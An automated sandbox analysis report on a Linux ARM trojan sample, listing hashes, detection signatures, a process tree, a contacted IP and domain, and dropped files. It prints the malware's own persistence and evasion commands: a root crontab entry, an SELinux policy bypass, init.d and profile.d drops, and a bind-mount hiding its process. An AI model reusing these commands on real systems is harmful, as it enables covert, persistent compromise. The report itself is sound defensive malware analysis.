Edit tour

Linux Analysis Report
arm5.elf

Overview

General Information

Sample name:	arm5.elf
Analysis ID:	1544065
MD5:	2c40da075f6d957e1b4e2e98543efe89
SHA1:	cb1483b4de0d4b6749ce26a5d61a55318e6cea7f
SHA256:	abb8063c9df05cf14daca16f0dc86118389ee23efe7746808317490710767406
Tags:	elfuser-abuse_ch
Infos:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Drops files in suspicious directories

Sample is packed with UPX

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to persist itself using cron

Sample tries to set files in /etc globally writable

Writes identical ELF files to multiple locations

Creates hidden files and/or directories

Creates hidden files without content (potentially used as a mutex)

Detected TCP or UDP traffic on non-standard ports

ELF contains segments with high entropy indicating compressed/encrypted content

Executes commands using a shell command-line interpreter

Executes the "systemctl" command used for controlling the systemd system and service manager

Reads the 'hosts' file potentially containing internal network hosts

Sample contains only a LOAD segment without any section mappings

Sample tries to set the executable flag

Sleeps for long times indicative of sandbox evasion

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Writes shell script file to disk with an unusual file extension

Writes shell script files to disk

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1544065
Start date and time:	2024-10-28 19:23:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	arm5.elf
Detection:	MAL
Classification:	mal76.spre.troj.evad.linELF@0/61@4/0

Warnings

VT rate limit hit for: arm5.elf

Runtime Messages

Command:	/tmp/arm5.elf
PID:	5434
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

arm5.elf (PID: 5434, Parent: 5357, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm5.elf

arm5.elf New Fork (PID: 5439, Parent: 5434)

arm5.elf (PID: 5439, Parent: 5434, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm5.elf

arm5.elf New Fork (PID: 5452, Parent: 5439)

bash (PID: 5452, Parent: 5439, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaon.service;systemctl start quotaon.service;journalctl -xe --no-pager"

bash New Fork (PID: 5457, Parent: 5452)

systemctl (PID: 5457, Parent: 5452, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

bash New Fork (PID: 5461, Parent: 5452)

systemctl (PID: 5461, Parent: 5452, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable quotaon.service

bash New Fork (PID: 5465, Parent: 5452)

systemctl (PID: 5465, Parent: 5452, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start quotaon.service

bash New Fork (PID: 5466, Parent: 5452)

journalctl (PID: 5466, Parent: 5452, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: journalctl -xe --no-pager

arm5.elf New Fork (PID: 5467, Parent: 5439)

bash (PID: 5467, Parent: 5439, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;ausearch -c 'system.pub' --raw | audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"

bash New Fork (PID: 5472, Parent: 5467)

bash New Fork (PID: 5473, Parent: 5467)

bash New Fork (PID: 5474, Parent: 5467)

arm5.elf New Fork (PID: 5475, Parent: 5439)

bash (PID: 5475, Parent: 5439, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"

arm5.elf New Fork (PID: 5483, Parent: 5439)

update-rc.d (PID: 5483, Parent: 5439, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d dns-udp4 defaults

update-rc.d New Fork (PID: 5485, Parent: 5483)

systemctl (PID: 5485, Parent: 5483, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

arm5.elf New Fork (PID: 5495, Parent: 5439)

mount (PID: 5495, Parent: 5439, MD5: 92b20aa8b155ecd3ba9414aa477ef565) Arguments: mount -o bind /tmp/ /proc/5439

arm5.elf New Fork (PID: 5521, Parent: 5439)

service (PID: 5521, Parent: 5439, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service cron start

service New Fork (PID: 5526, Parent: 5521)

basename (PID: 5526, Parent: 5521, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 5527, Parent: 5521)

basename (PID: 5527, Parent: 5521, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 5528, Parent: 5521)

systemctl (PID: 5528, Parent: 5521, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target

service New Fork (PID: 5541, Parent: 5521)

service New Fork (PID: 5542, Parent: 5541)

systemctl (PID: 5542, Parent: 5541, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket

service New Fork (PID: 5543, Parent: 5541)

sed (PID: 5543, Parent: 5541, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

systemctl (PID: 5521, Parent: 5439, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start cron.service

arm5.elf New Fork (PID: 5552, Parent: 5439)

systemctl (PID: 5552, Parent: 5439, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service

systemd New Fork (PID: 5459, Parent: 5458)

snapd-env-generator (PID: 5459, Parent: 5458, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 5463, Parent: 5462)

snapd-env-generator (PID: 5463, Parent: 5462, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 5487, Parent: 5486)

snapd-env-generator (PID: 5487, Parent: 5486, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 5509, Parent: 802)

dumpe2fs (PID: 5509, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 5544, Parent: 1)

cron (PID: 5544, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cron New Fork (PID: 5601, Parent: 5544)

cron New Fork (PID: 5608, Parent: 5601)

sh (PID: 5608, Parent: 5601, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "

sh New Fork (PID: 5609, Parent: 5608)

.mod (PID: 5609, Parent: 5608, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod

.mod New Fork (PID: 5610, Parent: 5609)

libgdi.so.0.8.2 (PID: 5610, Parent: 5609, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /usr/lib/libgdi.so.0.8.2

libgdi.so.0.8.2 New Fork (PID: 5615, Parent: 5610)

libgdi.so.0.8.2 (PID: 5615, Parent: 5610, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /usr/lib/libgdi.so.0.8.2

systemd New Fork (PID: 5627, Parent: 1)

cron (PID: 5627, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cron New Fork (PID: 5657, Parent: 5627)

cron New Fork (PID: 5658, Parent: 5657)

sh (PID: 5658, Parent: 5657, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "

sh New Fork (PID: 5659, Parent: 5658)

.mod (PID: 5659, Parent: 5658, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod

.mod New Fork (PID: 5660, Parent: 5659)

libgdi.so.0.8.2 (PID: 5660, Parent: 5659, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /usr/lib/libgdi.so.0.8.2

libgdi.so.0.8.2 New Fork (PID: 5665, Parent: 5660)

libgdi.so.0.8.2 (PID: 5665, Parent: 5660, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /usr/lib/libgdi.so.0.8.2

systemd New Fork (PID: 5678, Parent: 1)

cron (PID: 5678, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cleanup

Yara Signatures

⊘No yara matches

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: arm5.elf

ReversingLabs: Detection: 18%

Source: global traffic

TCP traffic: 192.168.2.13:33444 -> 93.123.109.118:1127

Source: /tmp/arm5.elf (PID: 5439)

Reads hosts file: /etc/hosts

Jump to behavior

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: j.xuanxuan1997.com

Source: libgdi.so.0.8.2, 5665.1.00007f7f144bf000.00007f7f14524000.rw-.sdmp	String found in binary or memory: http://.css
Source: libgdi.so.0.8.2, 5665.1.00007f7f144bf000.00007f7f14524000.rw-.sdmp	String found in binary or memory: http://.jpg
Source: libgdi.so.0.8.2, 5665.1.00007f7f144bf000.00007f7f14524000.rw-.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: arm5.elf, libgdi.so.0.8.2.14.dr, system.mark.14.dr, system.pub.14.dr, bash.cfg.14.dr	String found in binary or memory: http://upx.sf.net

Source: LOAD without section mappings

Program segment: 0x10000

Source: classification engine

Classification label: mal76.spre.troj.evad.linELF@0/61@4/0

Data Obfuscation

Sample is packed with UPX

Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/arm5.elf (PID: 5439)	File: /etc/profile.d/bash.cfg	Jump to behavior
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/profile.d/bash.cfg.sh	Jump to behavior
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/profile.d/gateway.sh	Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /usr/sbin/update-rc.d (PID: 5483)	File: /etc/rc2.d/S01dns-udp4 -> ../init.d/dns-udp4	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5483)	File: /etc/rc3.d/S01dns-udp4 -> ../init.d/dns-udp4	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5483)	File: /etc/rc4.d/S01dns-udp4 -> ../init.d/dns-udp4	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5483)	File: /etc/rc5.d/S01dns-udp4 -> ../init.d/dns-udp4	Jump to behavior

Sample tries to persist itself using cron

Source: /bin/bash (PID: 5475)

File: /etc/crontab

Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/arm5.elf (PID: 5439)

File: /etc/profile.d/bash.cfg (bits: - usr: rx grp: rx all: rwx)

Jump to behavior

Writes identical ELF files to multiple locations

Source: /tmp/arm5.elf (PID: 5439)	File with SHA-256 ABB8063C9DF05CF14DACA16F0DC86118389EE23EFE7746808317490710767406 written: /boot/system.pub	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File with SHA-256 ABB8063C9DF05CF14DACA16F0DC86118389EE23EFE7746808317490710767406 written: /usr/lib/system.mark	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File with SHA-256 ABB8063C9DF05CF14DACA16F0DC86118389EE23EFE7746808317490710767406 written: /etc/profile.d/bash.cfg	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File with SHA-256 ABB8063C9DF05CF14DACA16F0DC86118389EE23EFE7746808317490710767406 written: /usr/lib/libgdi.so.0.8.2	Jump to dropped file

Source: /tmp/arm5.elf (PID: 5439)	File: /etc/.ffff4444	Jump to behavior
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/.cfg	Jump to behavior
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/.cfg	Jump to behavior
Source: /tmp/arm5.elf (PID: 5439)	File: /.mod	Jump to behavior
Source: /.mod (PID: 5609)	Directory: /.mod	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5615)	File: /etc/.ffff4444	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5615)	File: /etc/.cfg	Jump to behavior
Source: /.mod (PID: 5659)	Directory: /.mod	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5665)	File: /etc/.ffff4444	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5665)	File: /etc/.cfg	Jump to behavior

Source: /usr/lib/libgdi.so.0.8.2 (PID: 5665)

Empty hidden file: /etc/.ffff4444

Jump to behavior

Source: /tmp/arm5.elf (PID: 5452)	Shell command executed: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaon.service;systemctl start quotaon.service;journalctl -xe --no-pager"	Jump to behavior
Source: /tmp/arm5.elf (PID: 5467)	Shell command executed: /bin/bash -c "cd /boot;ausearch -c 'system.pub' --raw \| audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"	Jump to behavior
Source: /tmp/arm5.elf (PID: 5475)	Shell command executed: /bin/bash -c "echo \"/1 * * * root /.mod \" >> /etc/crontab"	Jump to behavior
Source: /usr/sbin/cron (PID: 5608)	Shell command executed: /bin/sh -c "/.mod "	Jump to behavior
Source: /usr/sbin/cron (PID: 5658)	Shell command executed: /bin/sh -c "/.mod "	Jump to behavior

Source: /bin/bash (PID: 5457)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload	Jump to behavior
Source: /bin/bash (PID: 5461)	Systemctl executable: /usr/bin/systemctl -> systemctl enable quotaon.service	Jump to behavior
Source: /bin/bash (PID: 5465)	Systemctl executable: /usr/bin/systemctl -> systemctl start quotaon.service	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5485)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload	Jump to behavior
Source: /usr/sbin/service (PID: 5521)	Systemctl executable: /usr/bin/systemctl -> systemctl start cron.service	Jump to behavior
Source: /usr/sbin/service (PID: 5528)	Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target	Jump to behavior
Source: /usr/sbin/service (PID: 5542)	Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket	Jump to behavior
Source: /tmp/arm5.elf (PID: 5552)	Systemctl executable: /usr/bin/systemctl -> systemctl start crond.service	Jump to behavior

Source: /tmp/arm5.elf (PID: 5439)	File: /boot/system.pub (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/profile.d/bash.cfg (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/arm5.elf (PID: 5439)	File: /usr/lib/libgdi.so.0.8.2 (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/arm5.elf (PID: 5439)	File: /usr/lib/system.mark (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/arm5.elf (PID: 5439)	File written: /boot/system.pub	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File written: /etc/profile.d/bash.cfg	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File written: /usr/lib/libgdi.so.0.8.2	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File written: /usr/lib/system.mark	Jump to dropped file

Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /.mod	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/acpid	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/alsa-utils	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/anacron	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/apparmor	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/apport	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/avahi-daemon	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/binfmt-support	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/bluetooth	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cron	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisks	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisks-early	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cups	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cups-browsed	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/dbus	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/gdm3	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/hddtemp	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/irqbalance	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/iscsid	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/kmod	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lightdm	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lm-sensors	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lvm2-lvmpolld	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/mono-xsp4	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/multipath-tools	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/open-iscsi	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/open-vm-tools	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouth	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouth-log	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/procps	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/rsync	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/rsyslog	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/saned	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/screen-cleanup	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/spice-vdagent	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/ssh	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/udev	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/ufw	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/unattended-upgrades	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/uuidd	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/x11-common	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Writes shell script file to disk with an unusual file extension: /etc/init.d/dns-udp4	Jump to dropped file

Source: /tmp/arm5.elf (PID: 5439)	Shell script file created: /etc/profile.d/bash.cfg.sh	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Shell script file created: /etc/init.d/console-setup.sh	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Shell script file created: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Shell script file created: /etc/init.d/keyboard-setup.sh	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	Shell script file created: /etc/profile.d/gateway.sh	Jump to dropped file

Source: /usr/sbin/service (PID: 5543)

Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/acpid	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/alsa-utils	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/anacron	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/apparmor	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/apport	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/avahi-daemon	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/binfmt-support	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/bluetooth	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/console-setup.sh	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/cron	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/cryptdisks	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/cryptdisks-early	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/cups	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/cups-browsed	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/dbus	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/gdm3	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/hddtemp	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/irqbalance	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/iscsid	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/keyboard-setup.sh	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/kmod	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/lightdm	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/lm-sensors	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/lvm2-lvmpolld	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/mono-xsp4	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/multipath-tools	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/open-iscsi	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/open-vm-tools	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/plymouth	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/plymouth-log	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/procps	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/rsync	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/rsyslog	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/saned	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/screen-cleanup	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/spice-vdagent	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/ssh	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/udev	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/ufw	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/unattended-upgrades	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/uuidd	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/x11-common	Jump to dropped file
Source: /tmp/arm5.elf (PID: 5439)	File: /etc/init.d/dns-udp4	Jump to dropped file

Source: arm5.elf	Submission file: segment LOAD with 7.8878 entropy (max. 8.0)
Source: system.pub.14.dr	Dropped file: segment LOAD with 7.8878 entropy (max. 8.0)
Source: bash.cfg.14.dr	Dropped file: segment LOAD with 7.8878 entropy (max. 8.0)
Source: libgdi.so.0.8.2.14.dr	Dropped file: segment LOAD with 7.8878 entropy (max. 8.0)
Source: system.mark.14.dr	Dropped file: segment LOAD with 7.8878 entropy (max. 8.0)

Source: /usr/sbin/cron (PID: 5544)	Sleeps longer then 60s: 60.0s			Jump to behavior
Source: /usr/sbin/cron (PID: 5627)	Sleeps longer then 60s: 60.0s			Jump to behavior

Source: /tmp/arm5.elf (PID: 5434)	Queries kernel information via 'uname':	Jump to behavior
Source: /tmp/arm5.elf (PID: 5439)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5452)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5467)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5475)	Queries kernel information via 'uname':	Jump to behavior
Source: /.mod (PID: 5609)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5610)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5615)	Queries kernel information via 'uname':	Jump to behavior
Source: /.mod (PID: 5659)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5660)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5665)	Queries kernel information via 'uname':	Jump to behavior

Source: libgdi.so.0.8.2, 5615.1.000055f20a579000.000055f20abe6000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm1RelativeDistinguishedName
Source: open-vm-tools.14.dr	Binary or memory string: rm -f /var/run/vmtoolsd.pid
Source: .mod, 5660.1.000055bd3e865000.000055bd3eed3000.rw-.sdmp, libgdi.so.0.8.2, 5660.1.000055bd3e865000.000055bd3eed3000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm
Source: .mod, 5660.1.00007fff28d45000.00007fff28d66000.rw-.sdmp, libgdi.so.0.8.2, 5660.1.00007fff28d45000.00007fff28d66000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/usr/lib/libgdi.so.0.8.2SHELL=/bin/shPWD=/rootLOGNAME=rootHOME=/rootLANG=en_US.UTF-8SHLVL=1PATH=/usr/bin:/bin_=/usr/lib/libgdi.so.0.8.2/usr/lib/libgdi.so.0.8.2
Source: open-vm-tools.14.dr	Binary or memory string: checktool='vmware-checkvm'
